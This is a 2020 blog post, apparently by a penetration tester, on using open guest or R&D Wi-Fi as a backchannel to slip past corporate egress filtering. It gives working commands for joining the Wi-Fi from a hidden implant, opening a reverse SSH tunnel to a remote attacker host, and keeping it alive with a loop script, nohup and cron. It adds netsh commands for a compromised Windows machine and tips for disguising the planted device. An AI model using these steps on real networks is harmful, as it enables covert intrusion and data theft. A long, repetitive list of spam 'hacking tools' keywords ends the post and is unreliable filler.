Thursday, August 20, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

More info


  1. Hacker Tools For Mac
  2. Hacking Tools 2020
  3. Pentest Tools Framework
  4. Pentest Recon Tools
  5. Kik Hack Tools
  6. Hacking App
  7. Best Hacking Tools 2019
  8. Hacking Tools Windows 10
  9. Pentest Tools Subdomain
  10. Hack Website Online Tool
  11. Hack And Tools
  12. Pentest Tools Subdomain
  13. Termux Hacking Tools 2019
  14. How To Install Pentest Tools In Ubuntu
  15. Pentest Tools Alternative
  16. Hacking Apps
  17. Pentest Tools Github
  18. Hacking Tools For Beginners
  19. Hacking Tools Free Download
  20. Hacker Tools 2019
  21. Pentest Tools Android
  22. Pentest Tools Bluekeep
  23. Hacking Tools And Software
  24. Hacking Tools Free Download
  25. Hacker
  26. Hacker Tools Linux
  27. Nsa Hacker Tools
  28. Hacker Tools For Windows
  29. Bluetooth Hacking Tools Kali
  30. Pentest Tools For Mac
  31. Hacker Tools Apk Download
  32. Hacking Tools For Beginners
  33. Hacker Tools For Ios
  34. Hacks And Tools
  35. Hacker Tools Windows
  36. Pentest Tools For Mac
  37. Pentest Tools Website
  38. Hack Tools
  39. Hacker Tools 2019
  40. Hacker Tools For Ios
  41. Hacker Tools For Pc
  42. Pentest Tools Download
  43. Nsa Hacker Tools
  44. Hacker Tools Software
  45. Hacker Tools For Mac
  46. Hacker Tools 2019
  47. Hackrf Tools
  48. How To Install Pentest Tools In Ubuntu
  49. Hacking Tools For Windows 7
  50. Pentest Tools Bluekeep
  51. Hacking Tools Windows
  52. Pentest Tools Linux
  53. Hacker Tools Online
  54. Tools Used For Hacking
  55. Termux Hacking Tools 2019
  56. What Are Hacking Tools
  57. Hack Website Online Tool
  58. Pentest Tools Alternative
  59. Hack Tools
  60. Pentest Tools List
  61. Pentest Tools Subdomain
  62. Hacker Techniques Tools And Incident Handling
  63. Hack Tools For Mac
  64. What Is Hacking Tools
  65. Black Hat Hacker Tools
  66. Pentest Tools Port Scanner
  67. Hacker Search Tools
  68. Hacking Tools 2019
  69. Pentest Tools Free
  70. Hacking Tools Hardware
  71. Pentest Tools For Ubuntu
  72. Hacking Tools Online
  73. Pentest Box Tools Download
  74. Hacker Tools Linux
  75. Hacking Tools Kit
  76. Hack Tools Download
  77. Hacker Tools
  78. Physical Pentest Tools
  79. Hacker Tools For Mac
  80. Hacking Tools Download
  81. Hacking Tools Github
  82. Hak5 Tools
  83. Beginner Hacker Tools
  84. Hack Tools For Ubuntu
  85. Hackrf Tools
  86. Pentest Tools Windows
  87. Pentest Tools Kali Linux
  88. Hacking Apps
  89. Hacker Tools Hardware
  90. Hack App
  91. Game Hacking
  92. Pentest Tools Bluekeep
  93. What Is Hacking Tools
  94. Pentest Tools Find Subdomains
  95. Hack Tools
  96. Hacker Tools Apk Download
  97. Hacking Tools Online
  98. How To Install Pentest Tools In Ubuntu
  99. Hacker Tools Windows
  100. Pentest Tools Alternative
  101. Hack Tools For Windows
  102. Github Hacking Tools
  103. Pentest Tools Open Source
  104. Easy Hack Tools
  105. Hack Tools 2019
  106. Hacker Tools 2020
  107. Hak5 Tools
  108. Physical Pentest Tools
  109. Pentest Tools Website Vulnerability
  110. Hacker Tools Free Download
  111. Hacking Tools Github
  112. World No 1 Hacker Software
  113. Hacking Tools Software
  114. Best Hacking Tools 2020
  115. Hacker Tools Apk Download
  116. Hacker Tools 2020
  117. Hacker Tools Apk
  118. Hacker Tools Apk Download
  119. Hacking Tools Github
  120. Install Pentest Tools Ubuntu
  121. Hack Tools 2019
  122. Pentest Tools Website
  123. Hack Apps
  124. Pentest Tools Kali Linux
  125. Hacking Tools
  126. Hacking Tools Github
  127. Hack Tools Pc
  128. Hack Rom Tools
  129. Hacking Tools Usb
  130. Computer Hacker
  131. Pentest Tools Nmap
  132. Hack Tools Github
  133. Usb Pentest Tools
  134. Hacking Tools Software
  135. Nsa Hack Tools
  136. Hack Tool Apk No Root
  137. Black Hat Hacker Tools
  138. Hack Tools 2019
  139. Hacking Tools Download
  140. Black Hat Hacker Tools
  141. Tools 4 Hack
  142. Free Pentest Tools For Windows
  143. Hack Tools Download
  144. Pentest Tools For Mac
  145. Hacking Tools And Software
  146. How To Make Hacking Tools
  147. Hackrf Tools
  148. Hacker Tools Github
  149. Pentest Tools
  150. Hack Website Online Tool
  151. World No 1 Hacker Software
  152. Hacker Security Tools

No comments:

Post a Comment